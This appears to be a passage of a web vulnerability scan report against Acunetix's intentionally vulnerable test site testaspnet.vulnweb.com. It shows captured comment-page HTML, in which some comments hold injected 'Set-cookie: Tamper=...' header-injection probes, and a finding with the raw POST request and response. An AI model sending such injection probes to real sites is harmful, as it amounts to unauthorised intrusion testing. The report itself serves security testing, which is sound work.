5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:19 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:20 AM</DIV><DIV class="CommentText">any Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">any? Set-cookie: Tamper=477b294b-04f8-47aa-b86e-f54c84dfe7a7 </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:22 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:35 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:36 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:38 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:21 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:56 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Show / hide Request and Response
Request Header - size: 575 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:07 GMT Content-Length: 52088
Response Body - size: 52,088 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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